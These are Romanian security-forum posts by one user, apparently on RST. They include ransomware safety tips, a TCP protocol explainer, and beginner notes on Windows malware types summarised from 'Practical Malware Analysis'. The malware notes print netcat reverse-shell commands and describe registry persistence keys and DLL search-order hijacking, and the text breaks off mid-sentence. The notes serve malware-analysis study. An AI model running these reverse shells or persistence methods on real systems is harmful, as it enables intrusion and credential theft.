int21h.exe

Si marmota invelea ciocolata in staniol. Poate daca ai minim 7 ani de experienta si functie de conducere.

Nexus 6 is the shit. Mai ales daca vrei si un ecran mare. Singura problema o sa fie suportul de cacat pe care il ofera motorola, in caz ca ai nevoie.

Si eu: 1 bucata, bucuresti

Poti da te rog sursa? Care sunt cele 500 de websiteuri compromise?

E clar, are blackdoor...

On: nu se poate decat daca softul e programat sa adauge informatiile de identificare(distincte). Aplicatiile care asigura criptarea nu fac altceva decat sa implementeze niste algoritmi. Daca doua aplicatii implementeaza acelasi algoritm de criptare pe acelasi set de date, rezultatul e acelasi. Off: cu care nu e cacofonie.

Ms mult @shadowSQLi. Ce vroiam eu sa intreb este daca stie cineva detalii despre bresa de securitate din sistemele lor care a dus la leak-ul de 400GB.

Stie cineva detalii despre modul in care au fost compromisi?

Faceam research pe RST sa_mi fac update_urile zilnice. Nu de alta dar daca nu ai softul actualizat s_ar putea sa ti se para totul criptat. Am vazut ca e full disclosure la eufemisme si am zis testez si eu poate ajung in hall of fame. Dar e greu daca n_ai plugin_ul care trebuie sau esti end of support. Da_o_n centos_ul ei de treaba, asta e tot ce pot sa promovez in productie...

Sfaturi care v-ar putea ajuta impotriva [encrypting] ransomware ("noul" tip de atac cibernetic): - nu deschideti fisiere, mai ales worduri, exceluri, pdfuri si zipuri, primite de la persoane pe care nu le cunoasteti - pot contine virusi; - dezactivati macro-urile (word + excel); - faceti un backup periodic tuturor datelor importante si tineti-le pe un mediu de stocare extern; - folositi un antivirus si actualizati-l periodic; - folositi servicii de scanare online (e.g. virus total) sau sandbox/masina virtuala daca vreti neaparat sa deschideti documentul suspect; Nu e lista completa dar sunt demne de urmat. Bafta!

Se pare ca e vorba despre baietii astia.

O resursa de informatii online pe care am dscoperit-o de curand. Au niste cursuri video interesante, cel putin pentru incepatori. Nu fac reclama, nu am nicio treaba cu ei, just sharing. Cybrary

Daca e domeniu cumparat recent, asta e cauza. Serviciile de email gratuit (hotmail, gmail, yahoo,etc ) tin cumva cont de asta si considera emailurile trimise de pe acea adresa ca fiind suspecte.

Nici eu nu vreau sa jignesc pe nimeni dar cred ca nu ai gandit foarte mult inainte sa postezi.E ca si cum i-ai considera pe cei care stau pe RST ca niste raufacatori de care trebuie sa te feresti.. // better @rtfmplay?

Da, asta e intrebarea! Si, ca sa fiu in tema: another one bites the dust!

Intra si tu pe site-ul lor si vezi ce comision de administrare au pentru tipul tau de card. Mai mult de 5 lei lunar nu are cum sa fie.

Salut, asa este, am specificat acest lucru separat, dupa explicarea procesului in 4 pasi :

Randurile de mai jos constituie ceea ce mi s-a parut ca este important de stiut/retinut despre acest protocol. Nu exista o sursa anume, este o comasare a informatiilor(asadar se pot repeta unele chestii) asa cum le-am inteles eu (deci pot sa apara unele erori) TCP - Transmission Control Protocol ================================================================================== Specificatii complete, oficiale : RFC 793 (Request For Coment - RFC) Cuprins 1. Cum functioneaza TCP 2. Caracteristici principale TCP 3. Explicatii caracteristici 4. Segmentul TCP: 5. TCP Flags 7. Stabilirea si incheierea conexiunii Protocol : un set de reguli ce prezinta formatul utilizat la comunicarea intre sisteme. ================================================================================== 1. Cum functioneaza TCP -> inainte ca transferul datelor sa inceapa, TCP stabileste o conexiune intre doua procese de aplicatie prin stabilirea/setarea parametrilor de protocol. Acesti parametrii sunt stocati intr-o structura variabila denumita TCB (transmission control blocks). Odata ce conexiunea a fost stabilita, transferul datelor poate incepe. In timpul transmisiei parametrii se pot modifica pentru a eficientiza transmisia sau pentru a preveni congestiile. La sfarsit,conexiunea este inchisa. in anumite imprejurari conexiunea poate fi terminata fara o inchidere formala (FIN-> FIN/ACK..) ============================================================================================================================================= 2. Caracteristici principale TCP TCP, Protocol la nivelul transport (transport layer) - peste IP- este: -> orientat pe flux -> sparge datele trimise in bucati mai mici la nivelul sursei si le reasambleaza la nivelul destinatarului -> de incredere , verifica starea pachetelor, erorile, daca pachetele au fost primite etc, -> orientat/bazat pe conexiune (deschide/ inchide o comunicatie intre 2 hosturi) -> complex -> doar unicast -> utilizat pentru cele mai multe aplicatii : web(HTTP), email (SMTP), transfer fisiere(FTP), terminal (telnet), etc TCP : furnizeaza servicii complete la nivelul transport aplicatiilor. TCP : furnizeaza o conexiune de incredere intre ambele capete ale transmisiunii. Aceasta conexiune trebuie setata, mentinuta si apoi inchisa TCP : divizeaza fluxul de date in in unitati de marimi limitate numite "segmente". Aceste segmente sunt reasamblate intr-o maniera de incredere la nivelul destinatarului. Increderea se obtine prin mentinerea secventei originale la asamblarea segmentelor si cererea de retransmisie a datelor pierdute sau corupte. In timp ce protocolul IP furnizeaza adresarea logica a segmentelor si este responsabil pentru transmiterea lor in retele, protocolul TCP furnizeza o adresare aditionala care permite infiintarea/setarea unor conexiuni pentru mai multe aplicatii si servicii in acelasi timp. Fiecare aplicatie care cauta conexiune TCP este asignata unui port. TCP : furnizeaza o conexiune logica in ambele sensuri concomitent (full duplex) intre 2 procese la nivelul aplicatie(layer 5). TCP : da voie destinatarului sa controleze rata la care (cantitatea in care) sender-ul ii trimite date, pentru a evita buffer overflow-ul. =============================================================================================================================================== 3. Explicatii caracteristici TCP - Protocol orientat pe conexiune: -> procesele participante stabilesc o conexiune si negociaza parametrii acesteia. Negocierea se face prin transmiterea unor blocuri de control (TCB -transmission control blocks). La sfarsitul transmisiei conexiunea trebuie inchisa : TCP inchide fiecare sens al conexiunii in mod separat, ceea ce permite ca fluxul de date intr-un sens sa continue chiar si dupa ce celalalt sens a fost inchis. TCP - Protocol de incredere: -> inseamna fie ca toate segmentele/datele au fost livrate cu succes fie conexiunea e "stricata". TCP este creat sa mearga peste IP si astfel nu isi asuma ca serviciile care stau la baza retelei sunt de incredere: pentru a asigura increderea, fiecarei bucati de data ii este atribuit un numar si este angajata o cerere repetitiva automata (ARQ - automatic repeat request) selectiva, care sa ceara retransmiterea bucatilor pierdute sau corupte. TCP: In secventa(secvential) -> garanteaza ca datele sunt primite de procesul destinatar in aceasi ordine in care au fost trimse. Secventierea este implementata prin acelasi mecanism utilizat la detectarea bucatilor lipsa. Toate datele primite sunt stocate intr-un bufer de intrare in functie de numarul primit de fiecare bucata in parte. Procesul care destinatar, citeste datele din buffer in secventa corecta. TCP: Protocol orientat pe flux -> conexiunea poate fi perceputa ca fiind continua in ciuda faptului ca serviciile care stau la baza retelei trimit datele in bucati. Aceste bucati pot avea diverse marimi si pot avea o limita de marime maxima. Procesul sender poate trimite datele fie in mod continuu fie in rafale/explozie. Toate datele de trimis sunt stocate intr-un buffer de iesire, fiind mai apoi partitionate, sparte in bucati, numite segmente conform protocolului TCP si apoi sunt trimise peste retea. In partea destinatarului, datele(segmentele) primite sunt stocate intr-un bufer de intrare conform cu secventierea discutata anterior si de unde procesul destinatar le poate citi fie bucata cu bucata (segment cu segment)) fie byte dupa byte. TCP : Protocol full duplex: -> fiecare parte implicata in transmisiune are control asupra ei. Spre exemplu fiecare parte poate trimite date in orice moment sau poate incheia transmisiunea in orice moment. =============================================================================================================================================== 4. Segmentul TCP - desi este protocol Byte-oriented, transmiterea unui byte per pachet IP ar fi ineficienta. Asa ca se datele sunt impartite in bucati (chunk) denumite segmente. Ficare segment e incapsulat in datagrama IP si apoi trimis. - fiecare segment este constituit din header/antet (obligatoriu) si date (optional) Header-ul este format din: -> Adresa port sursa : (16 biti) numarul portului asignat procesului care trimite optiunile sau datele din segment; -> Adresa port destinatar: (16 biti) numarul portului asignat procesului care primeste optiunile sau datele continute in segment; -> Numar secventa : (32 biti) contine numarul asignat primului byte al datelor trimise in segment; cand este stabilita conexiunea, fiecare parte genereaza propriul sau numar de secventa initial (ISN - initial sequence number) aleator, care este incrementat cu unu cu fiecare byte de date. -> Numar de confirmare(Acknowledgment No): (32biti) contine numarul secventei pentru urmatorul segment care se asteapta sa fie primit de ceqalalta parte. -> Lungime antet (header length): (4 biti) contine marimea headerului segmentului, impartita la 4. Deoarece headerul poate avea intre 20-60 bytes plaja de valori este cuprinsa intre 5 si 15. -> Rezervat : (6 biti) camp rezervat pentru o utilizare viitoare; -> Control : (6 biti) contine flaguri de control a transmisiunii (URG, ACK, PSH, RST, SYN, FIN); -> Marime fereastra (window size) : (16 biti) contine contine informatii despre marimea ferestrei de transmisie pe care cealalta parte trebuie sa o mentina. -> Checksum : (16 biti) contine valoarea de control. Aceasta se obtine astfel: se umple initial cu valoarea 0. Se adauga un pseudo-header cu informatii din IP. Se trateaza intregul segment cu cu pseudo headerul ca un flux de numere de 16 biti. Daca numarul de bytes este par, se adauga 0 la sfarsit. Se adauga toate numerele de 16 biti utilizand metoda "1’s complement binary arithmetic". Se complementeaza rezultatul si se introduce in camplu Checksum. : Mod de verificare Checksum: destinatarul (receiver-ul) calculaeaza valoarea de control pentru pachetul primit,care include si valoarea de control initiala, dupa adaugarea pseudo-headerului. Daca noua valoare de control nu este 0 inseamna ca pachetul este corupt si se va renunta la el. -> Pointerul "Urgent " (urgent pointer) : (16 biti) este utilizat doar daca este setat falagul "URG". Defineste locatia ultimului byte urgent din sectiunea de date a segmentului. Datele urgente sunt acele date trimise in afara secventei -> Optiuni : (pana la 40 bytes) pot fi adaugate headerului optiuni pana la maxim 40 bytes (320 biti). Optiunile sunt umplute/captusite (ha, ha, suna ca dracu padded in romana) cu zero-uri astfel incat numarul total de byte din header sa fie divizibil cu 4. --->TCP options: classification : end of options : 1 byte, utilizat ca padding la sfarsitul optiunilor; no operation (used for padding): 1 byte, utilizat pentru a umple spatiul intre optiuni si ca padding; setting maximum segment size : defineste marimea maxima a unei bucati de date -chunk ; setting window scale factor; time stamp. =============================================================================================================================================== 5. TCP Flags –CWR: Congestion Window Reduced (ECE ACK) –ECE (ECN-Echo): Indicates congestion –URG: (Urgent pointer field significant) - Urgent. Daca acest bit este setat atunci pointerul urgent este valid. –ACK: (Acknowledgment field significant) - Confirmare. Daca acest bit este setat, numarul de confirmare este valid. –PSH: (Push function) - daca acest bit este setat, cealalta parte nu trebuie sa mai stocheze in buffer datele de trimis ci sa le trimita de indata ce sunt disponibile, fara sa le mai tina in buffer. –RST: (Reset the connection) - daca acest bit este setat, trebuie sa se renunte la conexiune imediat din cauza unei conditii speciale –SYN: (Synchronize sequence numbers) - bitul este setat in segmentul de cerere de conexiune in momentul stabilirii acesteia –FIN: (Finalyze : No more data from sender) - daca acest bit este setat inseamna ca senderul a terminat de transmis datele si nu mai are nimic altceva de transmis iar conexiunea poate fi inchisa. Procesul va astepta date in continuare pana cand cealalta parte trimite de asemenea FIN. =============================================================================================================================================== 6. Porturi bine-cunoscute utilizate cu TCP Port -- Protocol Description -- RFC/STD # 7 -- Echo -- Echoes a received data back to its sender -- STD20 9 -- Discard -- Discards any data that are received -- STD21 13 -- Daytime -- Returns the date and the time in ASCII string format -- STD25 19 -- Chargen -- Sends back arbitrary characters until connection closed -- STD22 20 -- FTP -- Data File Transfer Protocol (data transmission connection, unencrypted) -- STD9 21 -- FTP -- Control File Transfer protocol (control connection, unencrypted) -- STD9 22 -- SSH -- Secure Shell (SSH)—used for secure logins, file transfers (scp, sftp),and port forwarding -- RFC4250-4256 23 -- Telnet -- Telnet (unencrypted) -- STD8, STD27-32 25 -- SMTP -- Simple Mail Transfer Protocol (sending email) -- STD10 37 -- Time -- Returns the current time in seconds since 1/1/1900 in a 32 bit format -- STD26 53 -- Nameserver -- Domain Name Service -- STD13 80 -- HTTP -- Hypertext Transfer Protocol -- RFC2616 110 -- POP3 -- Post Office Protocol 3 (email download) -- STD53 111 -- RPC -- SUN Remote Procedure Call -- RFC5531 143 -- IMAP -- Interim Mail Access Protocol v2 (email access) -- RFC2060 443 -- SHTTP -- Secure Hypertext Transfer Protocol -- RFC2660 995 -- POP3 -- POP3 over TLS/SSL -- RFC2595 ============================================================================================================================================= 7. Stabilirea si incheierea conexiunii -> Stabilirea conexiunii intre 2 hosturi (A si B)se face in 4 pasi: hostul A trimite un segment prin care anunta ca vrea sa stabileasca o conexiune(SYN)). Acest segment contine informatiile initiale despre traficul de la A la B hostul B trimite un segment confirmand (ACK) primirea cererii de la A; hostul B trimite un segment cu informatia despre traficul de la B la A(SYN); hostul A trimite un segment confirmand (ACK) primirea cererii de la B; Pasii 2 si 3 pot fi uniti intr-un singur segment si rezulta "three-way handshaking" -> Incheierea conexiunii intre 2 hosturi. Poate fi initiata de oricare dintre procese : "four-way handshaking" hostul A trimite hostului B un segment prin care anunta ca vrea sa inchida conexiunea (FIN); hostul B trimite hostului A un segment de confirmare a cererii (ACK) - in acest moment conexiunea de la A la B este inchisa dar de la B la A ramane inca deschisa. cand hostul B este pregatit sa incheie si el conexiunea trimite un segment in care anunta acest lucru (FIN) hostul A trimite hostului B un segment de confirmare a cererii de inchidere si astfel conexiunea se inchde la amnele capete Daca unul din procese doreste sa abandoneze conexiunea in imprejurari anormale va trimite un segment cu RST(ReSeT nu Romanian Security Team! ) pentru a o distruge. ===================================2014@int21h.exe==========================================================================================================

ai PM. // le-am dat pe toate // ms @Oust

Daca iti faci card la ei, in mod normal te costa emiterea 44.95 $. Daca ai cupon si le dai codul aferent, iti dau banii inapoi.

Salut, In randurile ce urmeaza sunt sumarizate cele mai comune caracteristici ale software-urilor identificate ca fiind malware. Se face referire la malware doar prin prisma SO Windows, v. 32-Bit. Notiunile sunt la nivel de incepator si reprezinta notitele pe care le-am scos citind cartea "PRACTICAL MALWARE ANALYSIS - The Hands-On Guide to Dissecting Malicious Software" de Michael Sikorski si Andrew Honig. (SURSA) Sper sa fie de folos cuiva. Continut: 1. DOWNLOADERS SI LAUNCHERS(A.K.A. LOADERS) 2. BACKDOORS. 2.1. REVERSE SHELL 2.1.1. Reverse Shell Netcat 2.1.2. Reverse shell Windows 2.2. RAT (REMOTE ADMINISTRATION TOOL) 2.3. BOOTNET 3. CREDENTIAL STEALERS (MALWARE CARE "FURA" CREDENTIALE) 3.1. INTERCEPTARE GINA(GRAPHICAL IDENTIFICATION AND AUTHENTICATION) 3.2. HASH DUMPING 3.3. INREGISTRAREA TASTELOR APASATE (KEYSTROKE LOGGING) 3.3.1. Keyloggere kernel-based 3.3.2. Keyloggere user-space based 4. MECANISME DE PERSISTENTA 4.1. MODIFICAREA REGISTRILOR WINDOWS 4.1.1. AppInt_DLLs 4.1.2. Winlogon Notify 4.1.3. DLL-uri SvcHost 4.2. INFECTAREA CU TROIENI A BINARELOR (TROJANIZING BINARIES) 4.3. DLL LOAD-ORDER HIJACKING (DETURNAREA ORDINEI DE INCARCARE A DLL-URILOR IN MEMORIE) 5. ESCALADAREA PRIVILEGIILOR 6. ACOPERIREA URMELOR -> USER-MODE ROOTKITS Definitie: Malware : forma scurta de la „Malicious Software”, este acel software ostil sau intruziv care a fost creat in scopul perturbarii operatiunilor efectute de un sistem, in scopul adunarii de informatii sensibile dintr-un sistem, pentru a obtine acces neautorizat la un sistem sau pentru orice alt scop malitios/rau intentionat. 1. Downloaders si launchers(a.k.a. loaders) Downloaderele si loaderele sunt doua tipuri des intalnite de malware. Downloaderele pur si simplu downloadeaza, descarca, o alta aplicatie malware de pe internet si o executa local, in sistem infectat. Downloaderele sunt adesea ambalate ("packaged") intr-un exploit. Nota pentru analisti malware (NAM): downloaderele utilizeaza de obicei API-ul Windows "URLDownloadtoFileA" urmat de un apel al "WinExec" pentru a downloada si executa noua aplicatie malware. Un launcher/loader este orice executabil care instaleaza aplicatii malware in scopul executarii imediate sau viitoare a acestora. Loaderele contin adesea malware-ul pe care sunt proiectate sa le incarce. 2. Backdoors. Un backdoor este un tip de malware care furnizeaza unui atacator acces remote(acces de la distanta) la calculatorul victimei. Este cel mai intalnit tip de malware iar codul sau implementeaza adesea un set complet de capabilitati, asa ca atunci cand este utilizat, in mod normal nu este nevoie sa se mai downloadeze malware sau cod aditional. Un backdoor comunica peste internet in numeroase feluri dar cea mai comuna metoda este pe portul 80 utilizand protocolul HTTP. De ce? Pentru ca astfel isi poate ascunde cel mai bine in trafic datele trimise, pentru ca este un protocol foarte utilizat, etc. Un backdoor are un set de functionalitati in care sunt incluse si : abilitatea de a manipula registrii, abilitatea de creare de directoare in sistemul infectat, de a cauta fisiere in sistemul infectat, de a enumera ferestrele deschise, etc. NAM : se pot determina capabilitatile implementate de backdoor prin identificarea functiilor Windows pe care le importa si le foloseste acesta. 2.1. Reverse Shell Un reverse shell este defapt o conexiune deschisa de o masina infectata pentru o anumita adresa si care furnizeaza atacatorului accesul la un shell pe masina respectiva. Reverse shell-urile pot fi considerate atat malware de sine statatoare cat si componente ale unor backdoor-uri sofisticate. Avand un reverse shell, atacatorii pot executa comenzi ca si cum ar fi in sistemul local. 2.1.1. Reverse Shell Netcat Utilitarul, instrumentul, tool-ul Netcat poate fi utilizat pentru crearea unui reverse shell prin rularea pe doua masini(arhitectura server,client). Atacatorii utilizeaza Netcat sau ambaleaza Netcat (includ netcat) in aplicatii malware. Atunci cand se utilizeaza Netcat pentru un reverse shell, masina remote (victima, care este si serverul)este instructata sa asculte pentru conexiuni prin codul/instructiunea: nc -l –p 80 Optiunea -l seteaza Netcat in modul ascultare (listening) iar optiunea -p este folosita pentru a seta portul pe care se asculta. In continuare, calculatorul victima accepta conexiunea si furnizeaza shell-ul utilizand comanda : nc listener_ip 80 -e cmd.exe Listener_ip 80 reprezinta adresa IP si portul calculatorului remote (al atacatorului). Optiunea -e este utilizata pentru a stabili programul de executat odata ce conexiunea a fost stabilita, prin incercarea inputului si outputului standard de la program la socketul creat. 2.1.2. Reverse shell Windows Atacatorii folosesc doua implementari simple de codare a aplicatiilor malware pentru reverse shell in Windows, folosind cmd.exe : de baza si prin multithreading. NAM: - Metoda de baza este populara printre autorii de malware deoarece este mai usor de scris si in general functioneaza la fel de bine ca si tehnica multithreading. Aceasta metoda implica apelul functiei "CreateProcess" si manipularea structurii STARTUPINFO care este transmisa functiei "CreateProcess". Mai intai se creaza un socket si se stabileste o conexiune catre serverul remote. Acest socket este mai apoi legat la fluxurile standard (standard streams : standard input, standard output si standard error) pentru cmd.exe. Functia "CreateProcess" ruleaza cmd.exe cu fereastra suprimata,pentru a o ascunde de victima. - Versiunea multithreading a reverse shelului Windows implica actiunea de creare a unui socket, a doua conducte (o sa le las pipe) si a doua fire de executie(asadar se vor exista apeluri API catre "CreateThread" si "CreatePipe". Aceasta metoda este utilizata uneori de autorii aplicatiilor malware ca strategie de manipulare si codificare a datelor ce vin sau pleaca printr-un socket. 2.2. RAT (Remote administration tool) Un RAT este utilizat pentru a gestiona de la distanta unul sau mai multe calculatoare si sunt adesea utilizate in atacuri cu scopuri precise, specifice, cum ar fi furtul informatiilor sau deplasarea pe laterala intr-o retea. Ca si arhitectura de retea, exista un client (numit si centru de comanda si control -CC) care este operat/controlat de atacator si care trimite comenzi catre server/servere (victime). Serverele (masinile infectate) indruma clientul pentru a incepe o conexiune si mai apoi sunt controlate prin aceasta. Comunicatia RAT se desfasoara de obicei pe porturi comune ca 80 si 443. 2.3. Bootnet Un bootnet este o colectie de hosturi (calculatoare) compromise, numite si zombi (zombies), care sunt controlate de catre o singura entitate, de obicei folosind un server numit bootnet controller. Scopul unui bootnet este acela de a controla si compromite(infecta) cat mai multe hosturi pentru a se crea o retea cat mai mare de zombies, pe care bootnetul sa ii foloseasca pentru a imprastia (pentru a face spread) malware sau pentru a face spam, sau pentru sustine atacuri distributed denial-of-service (DDOS). Bootnet-urile pot da jos(pot pune offline) un website in urma atacarii acestuia cu toate calculatoarele zombies in acelasi timp. Intre bootnet si RAT exista urmatoarele diferente: - Intr-un bootnet pot exista milioane de hosturi infectate si controlate iar cu un RAT se pot controla mult mai putine deoarece interactiunea cu hostul infectat este mai mare; - Toate bootnet-urile sunt controlate in acelasi timp(toate hosturile primesc acceasi comanda simultan). Cu RAT se controleaza o singura victima la un moment-dat datorita nivelului ridicat de interactiune cu hostul controlat; - RAT sunt utilizate in atacurile tintite, ("targeted atacks") iar bootnet-urile sunt folosite la atacurile in masa. 3. Credential Stealers (malware care "fura" credentiale) Atacatorii folosesc in special 3 tipuri de malware pentru a captura credentiale: - programe care asteapta ca un utilizator sa se logeze undeva, pentru a-i fura credentialele; - programe care arunca/varsa ("dump") informatiile stocate in windows, cum sunt hash-urile parolelor, in scopul de a fi folosite direct sau "sparte"(gen decriptate) offline. - programe care stocheaza si/sau prelucreaza apasarile de taste (keyloggere) 3.1. Interceptare GINA(Graphical Identification and Authentication) Pe Windows XP, procedeul Microsoft de interceptare GINA constituie o tehnica pe care aplicatiile malware o utilizeaza sa fure credentialele. Systemul GINA intentiona sa permita entitatilor terte legitime sa personalizeze procesul de logon, adaugand suport pentru functionalitati ca autentificarea prin folosirea token-ului RFID (radio-frequency identification) sau a carteleor (smart card). Astfel autorii de malware profita de suportul entitatilor terte pentru a-si incarca stealerele de credentiale. NAM : GINA este implementat intr-un DLL (Dynamic Link Library), msgina.dll si este incarcat de executabilul Winlogon in timpul procesului de login. Ca si mod de actiune, aplicatia malware se interpune intre winlogon.exe si msgina.dll (exact ca in atacul man-in-the-middle) avand astfel acces la fluxul de informatii dintre acestea. 3.2. Hash Dumping "Varsarea" hash-urilor Windows este o cale foarte populara prin care aplicatiile malware acceseaza credentialele unui sistem. Hash-urile reprezinta rezultatul scriptic al criptarii parolelor. Atacatorii incearca sa puna mana pe aceste hash-uri cu scopul de a le decripta sau de a le utiliza in atacuri "pass-the-hash". Un atac "pass-the-hash" utilizeaza hash-uri LM (LAN Manager) si hash-uri NTLM (Network LAN Manager) pentru autentificarea la un host remote care foloseste autentificare NTLM, fara a fi nevoie ca parola sa fie obtinuta prin "spargerea" hash-ului. Pwdump si Pass-the-Hash (PSH) Toolkit sunt gratis si pot fi utilizate in scopul descris mai sus. Dar fiind unelte open-source, multe aplicatii malware au fost create prin modificarea codului sursa. Cei mai multi antivirusi au semnaturile pentru versiunile compilate default, dar atacatorii isi compileaza adesea propriile versiuni pentru a evita detectia. NAM : pwdump este un set de programe ce obtin parolele LM si NTLM ale conturilor de utilizatori locali din SAM (Security Account Manager). Pwdump functioneaza facand injectie DLL in procesul Local Security Authority Subsystem Service (LSASS, cunoscut si ca lsass.exe) 3.3. Inregistrarea tastelor apasate (Keystroke Logging) Keylogging-ul este o forma clasica de a fura credentialele. In timpul procesului de "keylogging" aplicatia malware inregistreaza tastele apasate, astfel atacatorul putand observa datele tastate incluzand username-uri si parole. Aplicatiile malware pentru Windows utilizeaza multe forme de "keylogging". 3.3.1. Keyloggere kernel-based Keyloggerele kernel-based sunt cele utilizate de aplicatii ce ruleaza in kernel-mode si sunt foarte greu de detectat. Frecvent fac parte dintr-un rootkit si se pot comporta ca si driverele tastaturii pentru a captura tastarile, pentru a trece peste programele si protectia din spatiul utilizatorului. 3.3.2. Keyloggere user-space based Keyloggerele din spatiul utilizatorului din Windows folosesc de obicei API-uri Windows si sunt implementate de obicei fie prin hooking(agatare) fie prin pooling(folosire la comun). - Hooking-ul foloseste API-urile Windows pentru a notifica aplicatia malware de fiecare data cand o tasta este apasata (NAM : de obicei prin apelul functiei "SetWindowsHookEx" ). Acest tip de keylogger poate fi ambalat ca si un executabil care initiaza functia de "agatare"-hook function, si poate include si un fisier DLL care sa gestioneza inregistrarea ce poate fi mapata automat in mai multe procese ale sistemului. - Pooling-ul foloseste API-urile Windows pentru a oferi constant informatii despre starea tastelor - apasate, neapasate si ferestrele active (NAM : de obicei apeland functiile "GetAsyncKeyState" si "GetForegroundWindow") 4. Mecanisme de persistenta Odata ce o aplicatie malware castiga accesul la un sistem, de cele mai multe ori vrea sa stea acolo cat mai mult. Acest comportament este cunoscut sub numele de "persitenta". Daca mecanismul prin care se asigura persistenta este indeajuns de unic, poate fi folosit chiar si ca o cale de a identifica o aplicatie malware(malware fingerprint). 4.1. Modificarea registrilor Windows Cea mai intalnita metoda de asigurare a persistentei. Asa cum stim, in registrii se stocheaza setarile intregului sistem.(software, hardware, user,etc) Spre exemplu, un malware isi asigura persistenta modificand cheia HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ceea ce inseamna ca va porni automat la pornirea calculatorului. Exista unelte care pot cauta registrii persistenti (ex :Autoruns), si care iti indica toate programele care ruleaza automat. Exista unelte care monitorizeaza modificarile in registrii (ProcMon), etc. Registrii de intrare populari, folositi adesea de malware: 4.1.1. AppInt_DLLs Autorii de malware pot asigura persistenta pentru DLL-urile lor prin utilizarea locatiei unui registru special numit "AppInt_DLLs"(o grupare de DLL-uri). DLL-urile din "AppInt_DLL" sunt incarcate in fiecare proces care incarca(importa) la randul sau User32.dll si o simpla insertie in registru va face ca AppInit_DLLs fie persistent. Valoarea pentru "AppInt_DLLs" este stocata in urmatorul registru Windows: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Valoarea AppInt_DLLs este de tip REG_SZ si consta intr-un string format din numele DLL-urilor separate prin spatiu. Cele mai multe procese incarca User32.dll si toate acestea incarca de asemenea DLL-urile din AppInit_DLLs. Adesea autori de aplicatii malware tintesc anumite procese iar faptul de mai sus este ca un bonus pentru ei. NAM: asadar, creatorii de malware trebuie sa verifice pentru a vedea in ce proces este executat DLL-ul inainte de a executa payload-ul lor. Aceasta verificare este adesea facuta in functia "DllMain" a DLL-ului infectat. 4.1.2. Winlogon Notify Autorii de aplicatii malware pot agata/atasa aplicatiile unui eveniment Winlogon particular, cum ar fi logon, logof,startup, shutdown si lock screen. Acest lucru poate permite aplicatiei malware sa fie incarcata pana si in safe mode! Intrarea in registru consta in valoarea pe care o are Notify in urmatorea cheie : HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\ Atunci cand winlogon.exe genereaza un eveniment, Windows verifica cheia registrului Notify pentru DLL-ul care il gestioneaza (handler). 4.1.3. DLL-uri SvcHost Stim ca toate serviciile persista in registrii iar daca sunt sterse din registrii, serviciile nu vor porni. Aplicatiile malware sunt adesea instalate ca si servicii Windows dar folosesc de obicei un executabil. Instaland aplicatii malware care sa aiba persistenta ca si un DLL svchost.exe permite ca malware-ul sa fie inclus in lista de procese si in registrii la fel de bine ca si un serviciu standard. „svchost.exe” este un proces generic al hostului pentru servicii care ruleaza din DLL-uri. Sistemul Windows poate rula adesea mai multe instante ale svchost.exe in acelasi timp. Fiecare instanta a svchost.exe contine un grup de servicii care fac ca developmentul, testarea si managementul grupului de servicii mai usoara. Grupurile sunt definite la urmatoarea locatie in registrii(fiecare valoare reprezinta un grup): HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost Serviciile sunt definite in registrii la urmatoarea locatie: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ServiceName Windows are un numar predefinit de grupuri de servicii asa ca aplicatiile malware nu creaza de obicei un nou grup deoarece vo fi usor de detectat. Insa, majoritatea aplicatiilor malware se vor adauga intr-un grup predefinit suprascriind un serviciu non-vital si rar folosit, din grupul de servicii netsvcs. 4.2. Infectarea cu troieni a binarelor (Trojanizing Binaries) Asigurarea persistentei prin modificarea fisierelor prin metoda „troianizarii” fisierelor binare(trojanizing binaries). Prin aceasta metoda, aplicatia malware patch-uieste bytes dintr-un sistem binar pentru a forta sistemul sa execute aplicatia malware data viitoare cand binarul infectat este incarcat in memorie sau rulat. Autorii programelor malware tintesc de obicei un sistem binar care este utilizat frecvent intr-o operatie efectuata de Windows. (DLL-urile sunt cele mai frecvente tinte.) Un sistem binar este modificat de obicei prin patch-uirea functiei de intrare astfel incat aceasta sa contina un salt la codul malitios. Patch-ul suprascrie partea de inceput a functiei sau alt cod care nu este necesar DLL-ului troianizat pentru a functiona in conditii optime. Codul malitios este adaugat la o sectiune goala a binarului astfel incat sa nu impacteze o operatie normala. Codul inserat incarca aplicatia malware si va functiona indiferen daca e inserat in DLL-ul infectat. Dupa ce codul incarca in memorie aplicatia malware, se sare la codul original al DLL-ului si totul se desfasoara ca mai inainte de aplicarea patch-ului. 4.3. DLL load-order hijacking (deturnarea ordinei de incarcare a DLL-urilor in memorie) Asigurarea persistentei fara a modifica registrii sau binare. Deturnarea ordinei de incarcare a DLL-urilor in memorie este o tehnica simpla, ascunsa, ce permite autorilor de malware sa creeze DLL-uri malitioase, persistente fara sa modifice registrii sau sa troianizeze binare. Aceasta tehnica nu necesita nici macar un loader malitios deoarece se bazeaza pe modul in care DLL-urile sunt incarcate de Windows SO. Ordinea de cautare default pentru incarcare unui DLL in windows XP este: Se cauta in directorul in din care s-a incarcat aplicatia in memorie. Se cauta in directorul curent Se cauta in directorul sistemului(NAM : se foloseste functia "GetSystemDirectory" pentru a se gasi calea, cum ar fi …/Windows/System32/) Se cauta in directorul sistemului, pe 16 biti( cum ar fi …/Windows/System/) Se cauta in directorul Windows Se cauta in directoare listate in catea (PATH) variabilei de sistem Sub Windows XP, procesul de incarcare a DLL-ului in memorie poate fi sarit daca se utilizeaza cheia de registru „KnownDLLs”, care contine o lista cu locatiile unor DLL-uri specifice, localizate de obicei in „…/Windows/System32/”. Mecanismul „KnownDLLs” a fost facut sa imbunatateasca securitatea(DLL-urile malitioase nu pot fi plasate mai sus in ordinea de incarcare) si viteza (Windows nu trebuie sa parcurga procesul prezentat mai sus ci stie direct unde sa mearga). Problema este ca poate sa contina doar o lista scurta a celor mai importante DLL-uri. Deturnarea ordinei de incarcare a DLL-urilor poate fi utilizata pe binare din alte directoare decat „/System32” ce incarca DLL-uri in „/System32” si care nu sunt protejate cu „KnownDLLs”. De exemplu, „explorer.exe” din directorul „/Windows” incarca DLL-ul „ntshrui.dll” din „/System32”. Deoarece „ntshrui.dll” nu este un DLL stiut (nu e in lista de „KnownDLLs”) ordine de cautare default de aplica si directorul „/Windows” va fi verificat inaintea directorului „/System32”. Daca un DLL malitios numit „ntshrui.dll”(ca cel cautat) este plasat 